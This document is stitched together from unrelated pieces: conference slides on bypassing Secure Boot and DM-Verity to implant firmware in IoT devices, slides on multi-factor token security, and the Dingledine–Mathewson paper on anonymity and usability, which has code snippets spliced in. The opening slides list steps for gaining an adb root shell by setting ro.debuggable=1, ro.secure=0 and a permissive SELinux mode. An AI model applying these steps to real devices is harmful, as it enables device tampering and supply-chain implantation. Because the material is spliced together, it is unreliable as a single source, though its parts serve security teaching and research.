• Secure Boot — core idea: before the boot code of the current stage loads the next-stage code, it verifies the integrity of that code based on PKI.
• Root of trust: every CPU that supports Secure Boot has a small piece of OTP storage, also called FUSE or eFUSE. It works like a real-world fuse: the information is written before the chip leaves the factory, and once written it can never be changed.
• DM-Verity: small partitions are signed directly or indirectly with the root of trust; larger partitions, such as the system partition, are verified by comparison against a preset root hash.
• Root of trust -> Boot Verify -> DM-Verity: unbreakable?
• Bypassing Secure Boot: more than 90% of devices never have the eFuse burned, so Secure Boot can be bypassed directly. Even when secure boot is not enabled, the protection mechanisms from the bootloader downward may still be enabled, so you need to obtain the firmware and analyze the protection logic.
• With secure boot not enabled, the chip vendor's tools can be used to read and write the entire flash firmware (MTK).
• With secure boot not enabled, the chip vendor's tools can be used to read and write the entire flash firmware (Qualcomm).
• Bypassing Boot Verify through firmware analysis: frp, seccfg, the seccfg structure, the seccfg body structure.
• Bypassing DM-Verity through firmware analysis.
• Enable adb, disable SELinux, and get an adb root shell:
  set property ro.debuggable = 1
  androidboot.selinux=permissive
  ro.secure = 0
  Gain full access.
• Demo: supply chain implantation risk on a conference box.

How to avoid these flaws and protect supply chain security
• Where some vendors stand today:
  – Security awareness: physical-contact attacks are not considered vulnerabilities.
  – Chip cost: chips that support secure boot add cost.
  – R&D cost: unwillingness to invest effort in protection mechanisms.
  – Repair cost: enabling secure boot makes repairs harder.
  Raise security awareness, and treat security feature support as part of the product's base cost.
• Protection schemes some vendors use:
  – Clever backdoors that hide the debug switch.
  – Obfuscating and encrypting the program that controls debugging, to raise the cost of analysis.
  – Customizing the application installation logic in the underlying framework to resist implantation.
  Even a well-designed protection mechanism still needs to be secure at its root.
• The cost of fixing a defect rises at each stage of a hardware product: requirements, design, EVT, DVT, PVT, sale. Security should be involved as early as possible in the hardware product design and development process.
• By establishing an IoT product SDLC — project initiation, sourcing, EVT, DVT, PVT — and bringing security in at the project initiation stage, vulnerabilities that cannot be recalled after launch are addressed and products are protected from supply chain implantation attacks.

MANOEUVRE
Thanks for watching!
Jim

Knowledge factors: password, pass phrase, personal identification number (PIN), challenge response (the user must answer a question)
Ownership factors: ID card, security token, software token, phone, cell phone
Inherence factors: fingerprint, retinal pattern, DNA, signature, face, voice, unique bio-electric signals, or other biometric identifiers

• ID card — fake card
• Security token — high security protection
• Software token — export token
• Phone — fake phone number
• Cell phone — fake phone number and phone ID

Password types: static password, synchronous dynamic password, asynchronous password, challenge response (a time-based synchronous dynamic password is sketched at the end of this deck)

• Digital signature
• Disconnected tokens
• Connected tokens (smart card)
• Contactless tokens (Bluetooth tokens)
• Single sign-on software tokens

Fire and Forget: for time-based or event-based authentication; no input-data confirm/check function.
Auto Response: for data confirm/check function. Most connected tokens are designed as the Auto Response type — one PIN code protection, digital signature, support for data confirm/check.

Auto Response token: do not use a fixed input data format; add a trap for protection; add a dynamic PIN at the system level.
Fire and Forget token: unique ID / no entry for attack path / mixed mode with Auto Response and Fire and Forget.
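A synchronous dynamic password of the time-based kind is typically implemented as a time-based one-time password (TOTP). The following is a minimal sketch in Python of an RFC 6238-style dynamic PIN that a fire-and-forget token could display; the shared secret shown is hypothetical and would be provisioned into both the token and the server:

import base64, hashlib, hmac, struct, time

def totp(shared_secret_b32, time_step=30, digits=6):
    # HMAC-SHA1 over the number of time steps since the Unix epoch (RFC 6238),
    # then dynamic truncation down to a short numeric code (RFC 4226).
    key = base64.b32decode(shared_secret_b32, casefold=True)
    counter = int(time.time() // time_step)
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = (struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return str(code).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # hypothetical base32 shared secret

Because both sides derive the code independently from the shared secret and the clock, the token never needs to accept input, which is what makes it a fire-and-forget design.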
Anonymity Loves Company: Usability and the Network Effect Roger Dingledine and Nick Mathewson The Free Haven Project {arma,nickm}@freehaven.net Abstract. A growing field of literature is studying how usability im- pacts security [4]. One class of security software is anonymizing networks— overlay networks on the Internet that provide privacy by letting users transact (for example, fetch a web page or send an email) without re- vealing their communication partners. In this position paper we focus on the network effects of usability on privacy and security: usability is a factor as before, but the size of the user base also becomes a factor. We show that in anonymizing networks, even if you were smart enough and had enough time to use every system perfectly, you would nevertheless be right to choose your system based in part on its usability for other users. 1 Usability for others impacts your security While security software is the product of developers, the security it provides is a collaboration between developers and users. It’s not enough to make software that can be used securely—software that is hard to use often suffers in its security as a result. For example, suppose there are two popular mail encryption programs: Heavy- Crypto, which is more secure (when used correctly), and LightCrypto, which is easier to use. Suppose you can use either one, or both. Which should you choose? You might decide to use HeavyCrypto, since it protects your secrets better. But if you do, it’s likelier that when your friends send you confidential email, they’ll make a mistake and encrypt it badly or not at all. With LightCrypto, you can at least be more certain that all your friends’ correspondence with you will get some protection. What if you used both programs? If your tech-savvy friends use HeavyCrypto, and your less sophisticated friends use LightCrypto, then everybody will get as much protection as they can. But can all your friends really judge how able they are? If not, then by supporting a less usable option, you’ve made it likelier that your non-savvy friends will shoot themselves in the foot. The crucial insight here is that for email encryption, security is a collabora- tion between multiple people: both the sender and the receiver of a secret email must work together to protect its confidentiality. Thus, in order to protect your own security, you need to make sure that the system you use is not only usable by yourself, but by the other participants as well. This observation doesn’t mean that it’s always better to choose usability over security, of course: if a system doesn’t address your threat model, no amount of usability can make it secure. But conversely, if the people who need to use a system can’t or won’t use it correctly, its ideal security properties are irrelevant. Hard-to-use programs and protocols can hurt security in many ways: • Programs with insecure modes of operation are bound to be used unknow- ingly in those modes. • Optional security, once disabled, is often never re-enabled. For example, many users who ordinarily disable browser cookies for privacy reasons wind up re-enabling them so they can access sites that require cookies, and later leaving cookies enabled for all sites. • Badly labeled off switches for security are even worse: not only are they more prone to accidental selection, but they’re more vulnerable to social attackers who trick users into disabling their security. 
As an example, consider the page-long warning your browser provides when you go to a website with an expired or otherwise suspicious SSL certificate.
• Inconvenient security is often abandoned in the name of day-to-day efficiency: people often write down difficult passwords to keep from forgetting them, and share passwords in order to work together.
• Systems that provide a false sense of security prevent users from taking real measures to protect themselves: breakable encryption on ZIP archives, for example, can fool users into thinking that they don't need to encrypt email containing ZIP archives.
• Systems that provide bad mental models for their security can trick users into believing they are more safe than they really are: for example, many users interpret the "lock" icon in their web browsers to mean "You can safely enter personal information," when its meaning is closer to "Nobody can read your information on its way to the named website."1

2 Usability is even more important for privacy

We described above that usability affects security in systems that aim to protect data confidentiality. But when the goal is privacy, it can become even more important. Anonymizing networks such as Tor [8], JAP [3], Mixminion [6], and Mixmaster [12] aim to hide not only what is being said, but also who is communicating with whom, which users are using which websites, and so on. These systems have a broad range of users, including ordinary citizens who want to avoid being profiled for targeted advertisements, corporations who don't want to reveal information to their competitors, and law enforcement and government intelligence agencies who need to do operations on the Internet without being noticed.

1 Or more accurately, "Nobody can read your information on its way to someone who was able to convince one of the dozens to hundreds of CAs configured in your browser that they are the named website, or who was able to compromise the named website later on. Unless your computer has been compromised already."

Anonymity networks work by hiding users among users. An eavesdropper might be able to tell that Alice, Bob, and Carol are all using the network, but should not be able to tell which of them is talking to Dave. This property is summarized in the notion of an anonymity set—the total set of people who, so far as the attacker can tell, might be the one engaging in some activity of interest. The larger the set, the more anonymous the participants.2 When more users join the network, existing users become more secure, even if the new users never talk to the existing ones! [1, 2] Thus, "anonymity loves company."3

In a data confidentiality system like PGP, Alice and Bob can decide by themselves that they want to get security. As long as they both use the software properly, no third party can intercept the traffic and break their encryption. However, Alice and Bob can't get anonymity by themselves: they need to participate in an infrastructure that coordinates users to provide cover for each other.

No organization can build this infrastructure for its own sole use. If a single corporation or government agency were to build a private network to protect its operations, any connections entering or leaving that network would be obviously linkable to the controlling organization. The members and operations of that agency would be easier, not harder, to distinguish.
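The raw size of an anonymity set can overstate the protection it gives when the attacker's suspicion is spread unevenly (the 98%/1%/1% situation described in footnote 2 below). The information-theoretic measures that footnote points to amount to treating suspicion as a probability distribution and reporting its entropy; a toy illustration, not code from the cited papers:

    import math

    def effective_anonymity(suspicion: dict) -> float:
        """Entropy-based 'effective' anonymity set size: 2 ** H(suspicion distribution)."""
        total = sum(suspicion.values())
        probs = [v / total for v in suspicion.values() if v > 0]
        return 2 ** -sum(p * math.log2(p) for p in probs)

    print(effective_anonymity({"alice": 1, "bob": 1, "carol": 1}))           # ~3.0: three equally plausible users
    print(effective_anonymity({"alice": 0.98, "bob": 0.01, "carol": 0.01}))  # ~1.1: same set size, far less anonymity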
Thus, to provide anonymity to any of its users, the network must accept traffic from external users, so the various user groups can blend together.

In practice, existing commercial anonymity solutions (like Anonymizer.com) are based on a set of single-hop proxies. In these systems, each user connects to a single proxy, which then relays the user's traffic. Single proxies provide comparatively weak security, since a compromised proxy can trivially observe all of its users' actions, and an eavesdropper only needs to watch a single proxy to perform timing correlation attacks against all its users' traffic. Worse, all users need to trust the proxy company to have good security itself as well as to not reveal user activities.

The solution is distributed trust: an infrastructure made up of many independently controlled proxies that work together to make sure no transaction's privacy relies on any single proxy. With distributed-trust anonymity networks, users build tunnels or circuits through a series of servers. They encrypt their traffic in multiple layers of encryption, and each server removes a single layer of encryption. No single server knows the entire path from the user to the user's chosen destination. Therefore an attacker can't break the user's anonymity by compromising or eavesdropping on any one server.

2 Assuming that all participants are equally plausible, of course. If the attacker suspects Alice, Bob, and Carol equally, Alice is more anonymous than if the attacker is 98% suspicious of Alice and 1% suspicious of Bob and Carol, even though the anonymity sets are the same size. Because of this imprecision, research is moving beyond simple anonymity sets to more sophisticated measures based on the attacker's confidence [7, 14].

3 This catch-phrase was first made popular in our context by the authors of the Crowds [13] anonymity network.

Despite their increased security, distributed-trust anonymity networks have their disadvantages. Because traffic needs to be relayed through multiple servers, performance is often (but not always) worse. Also, the software to implement a distributed-trust anonymity network is significantly more difficult to design and implement.

Beyond these issues of the architecture and ownership of the network, however, there is another catch. For users to keep the same anonymity set, they need to act like each other. If Alice's client acts completely unlike Bob's client, or if Alice's messages leave the system acting completely unlike Bob's, the attacker can use this information. In the worst case, Alice's messages stand out entering and leaving the network, and the attacker can treat Alice and those like her as if they were on a separate network of their own. But even if Alice's messages are only recognizable as they leave the network, an attacker can use this information to break exiting messages into "messages from User1," "messages from User2," and so on, and can now get away with linking messages to their senders as groups, rather than trying to guess from individual messages [6, 11]. Some of this partitioning is inevitable: if Alice speaks Arabic and Bob speaks Bulgarian, we can't force them both to learn English in order to mask each other.

What does this imply for usability? More so than with encryption systems, users of anonymizing networks may need to choose their systems based on how usable others will find them, in order to get the protection of a larger anonymity set.
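Returning to the distributed-trust design described above, the "multiple layers of encryption" idea can be sketched with any off-the-shelf symmetric cipher: the client wraps the payload once per server (innermost layer for the last hop), and each server strips exactly one layer. This is only a conceptual illustration, here using the Fernet recipe from the third-party cryptography package; real circuits also negotiate keys per hop, carry routing information, and use fixed-size cells:

    from cryptography.fernet import Fernet   # pip install cryptography

    hop_keys = [Fernet.generate_key() for _ in range(3)]   # one key per server in the circuit

    def wrap(payload: bytes, keys) -> bytes:
        """Client side: encrypt for the last hop first, then keep wrapping outward."""
        for key in reversed(keys):
            payload = Fernet(key).encrypt(payload)
        return payload

    def relay(onion: bytes, key: bytes) -> bytes:
        """Each server removes one layer; no single server can decrypt more than its own layer."""
        return Fernet(key).decrypt(onion)

    onion = wrap(b"GET / HTTP/1.0", hop_keys)
    for key in hop_keys:                                    # hop 1, hop 2, hop 3 in order
        onion = relay(onion, key)
    print(onion)                                            # b'GET / HTTP/1.0' emerges at the exit

Because each key opens only its own layer, a compromised middle server learns neither the plaintext nor both endpoints of the path.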
3 Case study: usability means users, users mean security

We'll consider an example. Practical anonymizing networks fall into two broad classes. High-latency networks like Mixminion or Mixmaster can resist strong attackers who can watch the whole network and control a large part of the network infrastructure. To prevent this "global attacker" from linking senders to recipients by correlating when messages enter and leave the system, high-latency networks introduce large delays into message delivery times, and are thus only suitable for applications like email and bulk data delivery—most users aren't willing to wait half an hour for their web pages to load.

Low-latency networks like Tor, on the other hand, are fast enough for web browsing, secure shell, and other interactive applications, but have a weaker threat model: an attacker who watches or controls both ends of a communication can trivially correlate message timing and link the communicating parties [5, 10].

Clearly, users who need to resist strong attackers must choose high-latency networks or nothing at all, and users who need to anonymize interactive applications must choose low-latency networks or nothing at all. But what should flexible users choose? Against an unknown threat model, with a non-interactive application (such as email), is it more secure to choose security or usability?

Security, we might decide. If the attacker turns out to be strong, then we'll prefer the high-latency network, and if the attacker is weak, then the extra protection doesn't hurt.

But since many users might find the high-latency network inconvenient, suppose that it gets few actual users—so few, in fact, that its maximum anonymity set is too small for our needs. In this case, we need to pick the low-latency system, since the high-latency system, though it always protects us, never protects us enough; whereas the low-latency system can give us enough protection against at least some attackers.

This decision is especially messy because even the developers who implement these anonymizing networks can't recommend which approach is safer, since they can't predict how many users each network will get and they can't predict the capabilities of the attackers we might see in the wild. Worse, the anonymity research field is still young, and doesn't have many convincing techniques for measuring and comparing the protection we get from various situations. So even if the developers or users could somehow divine what level of anonymity they require and what their expected attacker can do, the researchers still don't know what parameter values to recommend.

4 Case study: against options

Too often, designers faced with a security decision bow out, and instead leave the choice as an option: protocol designers leave implementors to decide, and implementors leave the choice for their users. This approach can be bad for security systems, and is nearly always bad for privacy systems.

With security:
• Extra options often delegate security decisions to those least able to understand what they imply. If the protocol designer can't decide whether the AES encryption algorithm is better than the Twofish encryption algorithm, how is the end user supposed to pick?
• Options make code harder to audit by increasing the volume of code, by increasing the number of possible configurations exponentially, and by guaranteeing that non-default configurations will receive little testing in the field.
If AES is always the default, even with several independent implementations of your protocol, how long will it take to notice if the Twofish implementation is wrong?

Most users stay with default configurations as long as they work, and only reconfigure their software as necessary to make it usable. For example, suppose the developers of a web browser can't decide whether to support a given extension with unknown security implications, so they leave it as a user-adjustable option, thinking that users can enable or disable the extension based on their security needs. In reality, however, if the extension is enabled by default, nearly all users will leave it on whether it's secure or not; and if the extension is disabled by default, users will tend to enable it based on their perceived demand for the extension rather than their security needs. Thus, only the most savvy and security-conscious users—the ones who know more about web security than the developers themselves—will actually wind up understanding the security implications of their decision.

The real issue here is that designers often end up with a situation where they need to choose between 'insecure' and 'inconvenient' as the default configuration—meaning they've already made a mistake in designing their application.

Of course, when end users do know more about their individual security requirements than application designers, then adding options is beneficial, especially when users describe their own situation (home or enterprise; shared versus single-user host) rather than trying to specify what the program should do about their situation.

In privacy applications, superfluous options are even worse. When there are many different possible configurations, eavesdroppers and insiders can often tell users apart by which settings they choose. For example, the Type I or "Cypherpunk" anonymous email network uses the OpenPGP encrypted message format, which supports many symmetric and asymmetric ciphers. Because different users prefer different ciphers, and because different versions of encryption programs implementing OpenPGP (such as PGP and GnuPG) use different cipher suites, users with uncommon preferences and versions stand out from the rest, and get little privacy at all.

Similarly, Type I allows users to pad their messages to a fixed size so that an eavesdropper can't correlate the sizes of messages passing through the network—but it forces the user to decide what size of padding to use! Unless a user can guess which padding size will happen to be most popular, the option provides attackers with another way to tell users apart.

Even when users' needs genuinely vary, adding options does not necessarily serve their privacy. In practice, the default option usually prevails for casual users, and therefore needs to prevail for security-conscious users even when it would not otherwise be their best choice. For example, when an anonymizing network allows user-selected message latency (like the Type I network does), most users tend to use whichever setting is the default, so long as it works. Of the fraction of users who change the default at all, most will not, in fact, understand the security implications; and those few who do will need to decide whether the increased traffic-analysis resistance that comes with more variable latency is worth the decreased anonymity that comes from splitting away from the bulk of the user base.
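The Type I padding option illustrates the trap: size padding only helps if everyone pads to the same sizes, so the size schedule belongs in the system, not in a per-user option. A sketch of the system-chosen alternative implied above, purely illustrative:

    import os
    import struct

    BUCKET = 32 * 1024   # one network-wide size, so the choice itself cannot distinguish users

    def pad(message: bytes) -> bytes:
        """Length-prefix the payload and fill the rest of the bucket with random bytes."""
        if len(message) + 4 > BUCKET:
            raise ValueError("message too large for a single bucket")
        return struct.pack(">I", len(message)) + message + os.urandom(BUCKET - 4 - len(message))

    def unpad(blob: bytes) -> bytes:
        (length,) = struct.unpack(">I", blob[:4])
        return blob[4:4 + length]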
5 Case study: Mixminion and MIME

We've argued that providing too many observable options can hurt privacy, but we've also argued that focusing too hard on privacy over usability can hurt privacy itself. What happens when these principles conflict?

We encountered such a situation when designing how the Mixminion anonymous email network [6] should handle MIME-encoded data. MIME (Multipurpose Internet Mail Extensions) is the way a mail client tells the receiving mail client about attachments, which character set was used, and so on. As a standard, MIME is so permissive and flexible that different email programs are almost always distinguishable by which subsets of the format, and which types of encodings, they choose to generate. Trying to "normalize" MIME by converting all mail to a standard only works up to a point: it's trivial to convert all encodings to quoted-printable, for example, or to impose a standard order for multipart/alternative parts; but demanding a uniform list of formats for multipart/alternative messages, normalizing HTML, stripping identifying information from Microsoft Office documents, or imposing a single character encoding on each language would likely be an impossible task.

Other possible solutions to this problem could include limiting users to a single email client, or simply banning email formats other than plain 7-bit ASCII. But these procrustean approaches would limit usability, and turn users away from the Mixminion network. Since fewer users mean less anonymity, we must ask whether users would be better off in a larger network where their messages are likelier to be distinguishable based on email client, or in a smaller network where everyone's email formats look the same.

Some distinguishability is inevitable anyway, since users differ in their interests, languages, and writing styles: if Alice writes about astronomy in Amharic, her messages are unlikely to be mistaken for Bob's, who writes about botany in Basque. Also, any attempt to restrict formats is likely to backfire. If we limited Mixminion to 7-bit ASCII, users wouldn't stop sending each other images, PDF files, and messages in Chinese: they would instead follow the same evolutionary path that led to MIME in the first place, and encode their messages in a variety of distinguishable formats, with each client software implementation having its own ad hoc favorites. So imposing uniformity in this place would not only drive away users, but would probably fail in the long run, and lead to fragmentation at least as dangerous as we were trying to avoid.

We also had to consider threat models. To take advantage of format distinguishability, an attacker needs to observe messages leaving the network, and either exploit prior knowledge of suspected senders ("Alice is the only user who owns a 1995 copy of Eudora"), or feed message format information into traffic analysis approaches ("Since half of the messages to Alice are written in English, I'll assume they mostly come from different senders than the ones in Amharic."). Neither attack is certain or easy for all attackers; even if we can't defeat them in the worst possible case (where the attacker knows, for example, that only one copy of LeetMailPro was ever sold), we can provide vulnerable users with protection against weaker attackers.
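To make the distinguishability concrete, here is a small sketch (not Mixminion's code) of the kind of per-message fingerprint an exit observer could build from MIME features; the normalization described above amounts to collapsing as many of these fields as possible to common values and warning about the rest:

    import email
    from email import policy

    RISKY = {"application/msword"}   # example of a type likely to carry identifying metadata

    def mime_fingerprint(raw: bytes) -> dict:
        """Collect the MIME features that tend to differ from one mail client to another."""
        msg = email.message_from_bytes(raw, policy=policy.default)
        return {
            "mailer": msg.get("X-Mailer"),   # often names the exact client and version
            "structure": [part.get_content_type() for part in msg.walk()],
            "encodings": sorted({str(part.get("Content-Transfer-Encoding", "7bit")) for part in msg.walk()}),
            "charsets": sorted(str(c) for c in msg.get_charsets() if c),
            "risky": [t for t in (part.get_content_type() for part in msg.walk()) if t in RISKY],
        }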
In the end, we compromised: we perform as much normalization as we can, and warn the user about document types such as MS Word that are likely to reveal identifying information, but we do not forbid any particular format or client software. This way, users are informed about how to blend with the largest possible anonymity set, but users who prefer to use distinguishable formats rather than nothing at all still receive and contribute protection against certain attackers.

6 Case study: Tor Installation

Usability and marketing have also proved important in the development of Tor, a low-latency anonymizing network for TCP traffic. The technical challenges Tor has solved, and the ones it still needs to address, are described in its design paper [8], but at this point many of the most crucial challenges are in adoption and usability.

While Tor was in its earliest stages, its user base was a small number of fairly sophisticated privacy enthusiasts with experience running Unix services, who wanted to experiment with the network (or so they say; by design, we don't track our users). As the project gained more attention from venues including security conferences, articles on Slashdot.org and Wired News, and more mainstream media like the New York Times, Forbes, and the Wall Street Journal, we added more users with less technical expertise. These users can now provide a broader base of anonymity for high-needs users, but only when they receive good support themselves.

For example, it has proven difficult to educate less sophisticated users about DNS issues. Anonymizing TCP streams (as Tor does) does no good if applications reveal where they are about to connect by first performing a non-anonymized hostname lookup. To stay anonymous, users need either to configure their applications to pass hostnames to Tor directly by using SOCKS4a or the hostname-based variant of SOCKS5; to manually resolve hostnames with Tor and pass the resulting IPs to their applications; or to direct their applications to application-specific proxies which handle each protocol's needs independently. None of these is easy for an unsophisticated user, and when they misconfigure their systems, they not only compromise their own privacy, but also provide no cover for the users who are configured correctly: if Bob leaks a DNS request whenever he is about to connect to a website, an observer can tell that anybody connecting to Alice's website anonymously must not be Bob. Thus, experienced users have an interest in making sure inexperienced users can use the system correctly. Tor being hard to configure is a weakness for everybody.

We've tried a few solutions that didn't work as well as we hoped. Improving documentation only helped the users who read it. We changed Tor to warn users who provided an IP address rather than a hostname, but this warning usually resulted in several email exchanges to explain DNS to the casual user, who had typically no idea how to solve his problem.

At the time of this writing, the most important solutions for these users have been to improve Tor's documentation for how to configure various applications to use Tor; to change the warning messages to refer users to a description of the solution ("You are insecure. See this webpage.") instead of a description of the problem ("Your application is sending IPs instead of hostnames, which may leak information. Consider using SOCKS4a instead."); and to bundle Tor with the support tools that it needs, rather than relying on users to find and configure them on their own.
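The reason SOCKS4a (or the hostname variant of SOCKS5) fixes the DNS leak is visible at the protocol level: the client hands the proxy the hostname itself, so name resolution happens inside the anonymized path instead of at the local resolver. A minimal sketch of a SOCKS4a CONNECT through a local proxy; 127.0.0.1:9050 is assumed as the proxy address, and error handling is kept minimal:

    import socket
    import struct

    def socks4a_connect(proxy: tuple, host: str, port: int) -> socket.socket:
        """Open a TCP connection to host:port via a SOCKS4a proxy, never resolving host locally."""
        s = socket.create_connection(proxy)
        # VN=4, CD=1 (CONNECT), destination port, then the invalid IP 0.0.0.1, which
        # signals that a hostname follows the (empty) user-id field.
        request = struct.pack(">BBH", 4, 1, port) + bytes([0, 0, 0, 1]) + b"\x00" + host.encode("ascii") + b"\x00"
        s.sendall(request)
        reply = s.recv(8)
        if len(reply) < 2 or reply[1] != 90:    # 90 = request granted
            raise ConnectionError("SOCKS4a request rejected")
        return s

    # Usage sketch: the hostname goes to the proxy, not to the local DNS resolver.
    # sock = socks4a_connect(("127.0.0.1", 9050), "example.com", 80)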
7 Case study: JAP and its anonym-o-meter

The Java Anon Proxy (JAP) is a low-latency anonymizing network for web browsing developed and deployed by the Technical University of Dresden in Germany [3]. Unlike Tor, which uses a free-route topology where each user can choose where to enter the network and where to exit, JAP has fixed-route cascades that aggregate user traffic into a single entry point and a single exit point.

The JAP client includes a GUI: notice the 'anonymity meter' giving the user an impression of the level of protection for his current traffic.

How do we decide the value that the anonym-o-meter should report? In JAP's case, it's based on the number of other users traveling through the cascade at the same time. But alas, since JAP aims for quick transmission of bytes from one end of the cascade to the other, it falls prey to the same end-to-end timing correlation attacks as we described above. That is, an attacker who can watch both ends of the cascade won't actually be distracted by the other users [5, 10]. The JAP team has plans to implement full-scale padding from every user (sending and receiving packets all the time even when they have nothing to send), but—for usability reasons—they haven't gone forward with these plans. As the system is now, anonymity sets don't provide a real measure of security for JAP, since any attacker who can watch both ends of the cascade wins, and the number of users on the network is no real obstacle to this attack. However, we think the anonym-o-meter is a great way to present security information to the user, and we hope to see a variant of it deployed one day for a high-latency system like Mixminion, where the amount of current traffic in the system is more directly related to the protection it offers.

8 Bootstrapping, confidence, and reputability

Another area where human factors are critical in privacy is in bootstrapping new systems. Since new systems start out with few users, they initially provide only small anonymity sets. This starting state creates a dilemma: a new system with improved privacy properties will only attract users once they believe it is popular and therefore has high anonymity sets; but a system cannot be popular without attracting users. New systems need users for privacy, but need privacy for users.

Low-needs users can break the deadlock [1]. The earliest stages of an anonymizing network's lifetime tend to involve users who need only to resist weak attackers who can't know which users are using the network and thus can't learn the contents of the small anonymity set. This solution reverses the early adopter trends of many security systems: rather than attracting first the most security-conscious users, privacy applications must begin by attracting low-needs users and hobbyists.

But this analysis relies on users' accurate perceptions of present and future anonymity set size. As in market economics, expectations themselves can bring about trends: a privacy system which people believe to be secure and popular will gain users, thus becoming (all things equal) more secure and popular. Thus, security depends not only on usability, but also on perceived usability by others, and hence on the quality of the provider's marketing and public relations.
Perversely, over-hyped systems (if they are not too broken) may be a better choice than modestly promoted ones, if the hype attracts more users.

Yet another factor in the safety of a given network is its reputability: the perception of its social value based on its current users. If I'm the only user of a system, it might be socially accepted, but I'm not getting any anonymity. Add a thousand Communists, and I'm anonymous, but everyone thinks I'm a Commie. Add a thousand random citizens (cancer survivors, privacy enthusiasts, and so on) and now I'm hard to profile. The more cancer survivors on Tor, the better for the human rights activists. The more script kiddies, the worse for the normal users.

Thus, reputability is an anonymity issue for two reasons. First, it impacts the sustainability of the network: a network that's always about to be shut down has difficulty attracting and keeping users, so its anonymity set suffers. Second, a disreputable network attracts the attention of powerful attackers who may not mind revealing the identities of all the users to uncover the few bad ones.

While people therefore have an incentive for the network to be used for "more reputable" activities than their own, there are still tradeoffs involved when it comes to anonymity. To follow the above example, a network used entirely by cancer survivors might welcome some Communists onto the network, though of course they'd prefer a wider variety of users.

The impact of public perception on security is especially important during the bootstrapping phase of the network, where the first few widely publicized uses of the network can dictate the types of users it attracts next.

9 Technical challenges to guessing the number of users in a network

In addition to the social problems we describe above that make it difficult for a typical user to guess which anonymizing network will be most popular, there are some technical challenges as well. These stem from the fact that anonymizing networks are good at hiding what's going on—even from their users. For example, one of the toughest attacks to solve is that an attacker might sign up many users to artificially inflate the apparent size of the network. Not only does this Sybil attack increase the odds that the attacker will be able to successfully compromise a given user transaction [9], but it might also trick users into thinking a given network is safer than it actually is.

And finally, as we saw when discussing JAP above, the feasibility of end-to-end attacks makes it hard to guess how much a given other user is contributing to your anonymity. Even if he's not actively trying to trick you, he can still fail to provide cover for you, either because his behavior is sufficiently different from yours (he's active during the day, and you're active at night), because his transactions are different (he talks about physics, you talk about AIDS), or because network design parameters (such as low delay for messages) mean the attacker is able to track transactions more easily.
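One way to see why an inflated participant count is misleading for low-latency designs: against an attacker who wins by watching both ends of a connection, what matters is roughly the chance that both the entry and the exit of a path are attacker-observed, not how large the network appears. A back-of-the-envelope sketch, assuming uniform path selection (which real networks do not exactly use):

    def end_to_end_compromise(attacker_relays: int, total_relays: int) -> float:
        """Rough chance that a given path has an attacker-controlled entry AND exit."""
        c = attacker_relays / total_relays
        return c * c

    # A Sybil attacker who doubles the network with fake relays makes it look twice as big,
    # yet now controls half the positions: roughly a 25% chance per path of owning both ends.
    print(end_to_end_compromise(100, 200))   # 0.25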
10 Bringing it all together

Users' safety relies on them behaving like other users. But how can they predict other users' behavior? If they need to behave in a way that's different from the rest of the users, how do they compute the tradeoff and risks? There are several lessons we might take away from researching anonymity and usability.

On the one hand, we might remark that anonymity is already tricky from a technical standpoint, and if we're required to get usability right as well before anybody can be safe, it will be hard indeed to come up with a good design: if lack of anonymity means lack of users, then we're stuck in a depressing loop. On the other hand, the loop has an optimistic side too. Good anonymity can mean more users: if we can make good headway on usability, then as long as the technical designs are adequate, we'll end up with enough users to make everything work out.

In any case, declining to design a good solution means leaving most users to a less secure network or no anonymizing network at all. Cancer survivors and abuse victims would continue communications and research over the Internet, risking social or employment problems; and human rights workers in oppressive countries would continue publishing their stories.

The temptation to focus on designing a perfectly usable system before building it can be self-defeating, since obstacles to usability are often unforeseen. We believe that the security community needs to focus on continuing experimental deployment.

References

1. Alessandro Acquisti, Roger Dingledine, and Paul Syverson. On the Economics of Anonymity. In Rebecca N. Wright, editor, Financial Cryptography. Springer-Verlag, LNCS 2742, January 2003.
2. Adam Back, Ulf Möller, and Anton Stiglic. Traffic Analysis Attacks and Trade-Offs in Anonymity Providing Systems. In Ira S. Moskowitz, editor, Information Hiding (IH 2001), pages 245–257. Springer-Verlag, LNCS 2137, 2001.
3. Oliver Berthold, Hannes Federrath, and Stefan Köpsell. Web MIXes: A system for anonymous and unobservable Internet access. In H. Federrath, editor, Designing Privacy Enhancing Technologies: Workshop on Design Issues in Anonymity and Unobservability. Springer-Verlag, LNCS 2009, July 2000.
4. Lorrie Cranor and Mary Ellen Zurko, editors. Proceedings of the Symposium on Usable Privacy and Security (SOUPS 2005), Pittsburgh, PA, July 2005.
5. George Danezis. The traffic analysis of continuous-time mixes. In David Martin and Andrei Serjantov, editors, Privacy Enhancing Technologies (PET 2004), LNCS, May 2004. http://www.cl.cam.ac.uk/users/gd216/cmm2.pdf.
6. George Danezis, Roger Dingledine, and Nick Mathewson. Mixminion: Design of a type III anonymous remailer protocol. In 2003 IEEE Symposium on Security and Privacy, pages 2–15. IEEE CS, May 2003.
7. Claudia Diaz, Stefaan Seys, Joris Claessens, and Bart Preneel. Towards measuring anonymity. In Paul Syverson and Roger Dingledine, editors, Privacy Enhancing Technologies, LNCS, April 2002.
8. Roger Dingledine, Nick Mathewson, and Paul Syverson. Tor: The Second-Generation Onion Router. In Proceedings of the 13th USENIX Security Symposium, August 2004.
9. John Douceur. The Sybil Attack. In Proceedings of the 1st International Peer To Peer Systems Workshop (IPTPS), March 2002.
10. Brian N. Levine, Michael K. Reiter, Chenxi Wang, and Matthew K. Wright. Timing attacks in low-latency mix-based systems. In Ari Juels, editor, Proceedings of Financial Cryptography (FC '04). Springer-Verlag, LNCS 3110, February 2004.
11. Nick Mathewson and Roger Dingledine. Practical Traffic Analysis: Extending and Resisting Statistical Disclosure. In Proceedings of Privacy Enhancing Technologies workshop (PET 2004), volume 3424 of LNCS, May 2004.
12. Ulf Möller, Lance Cottrell, Peter Palfrader, and Len Sassaman. Mixmaster Protocol — Version 2. Draft, July 2003. http://www.abditum.com/mixmaster-spec.txt.
13. Michael Reiter and Aviel Rubin. Crowds: Anonymity for web transactions. ACM Transactions on Information and System Security, 1(1), June 1998.
14. Andrei Serjantov and George Danezis. Towards an information theoretic metric for anonymity. In Paul Syverson and Roger Dingledine, editors, Privacy Enhancing Technologies, LNCS, San Francisco, CA, April 2002.
pdf